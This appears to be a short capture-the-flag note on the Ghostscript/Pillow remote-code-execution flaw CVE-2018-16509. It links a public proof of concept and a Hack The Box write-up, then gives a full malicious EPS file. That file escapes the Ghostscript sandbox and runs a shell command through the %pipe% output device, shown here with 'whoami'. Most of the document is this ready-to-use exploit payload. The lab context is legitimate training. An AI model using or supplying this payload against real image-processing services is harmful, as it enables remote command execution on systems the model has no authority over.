Need to read:
- https://github.com/farisv/PIL-RCE-Ghostscript-CVE-2018-16509/
- https://shakuganz.com/2021/06/11/hackthebox-petpet-rcbee-write-up/
Example: HTB - petpet rcbee
Payload
%!PS-Adobe-3.0 EPSF-3.0
%%BoundingBox: -0 -0 100 100
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%whoami) currentdevice putdeviceprops